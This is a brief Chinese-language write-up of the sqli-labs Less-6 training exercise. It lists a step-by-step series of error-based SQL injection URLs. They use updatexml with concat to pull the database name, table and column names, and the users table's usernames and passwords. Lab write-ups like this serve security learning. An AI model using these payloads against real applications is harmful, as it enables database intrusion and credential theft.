less6

 判断闭合

双引号

 没有回显，用报错注入。

这题和less5大致一样只是将闭合改了。

所以我就只附个码了

?id=1\

?id=1" order by 3--+

?id=1" and updatexml(1,concat(0x7e,database()),3) -- a

?id=1" and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,31)),3) -- a

?id=1" and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name='users'),1,31)),3) -- a

?id=1" and updatexml(1,concat(0x7e,substr((select group_concat(username,password) from users),1,31)),3) -- a

本栏目推荐文章
• devmapper: Thin Pool has 162394 free data blocks which is less than minimum required 163840 free data blocks
• Less的优点
• less命令
• 【sqli-labs】 page-2 Less 23-37
• 【sqli-labs】 page-3 Less 38-53
• 【sqli-labs】 page-4 Less 54-65
• Less不可小觑
• As a project I always want to create for myself as a gift, the MVVM framework is more or less satisfying
• [LeetCode] 2824. Count Pairs Whose Sum is Less than Target
• Less Prime素数单词

less6 lessless6 less6 less less less7 less2 less4 less1 graph-less less5 sqli-labs sqli labs less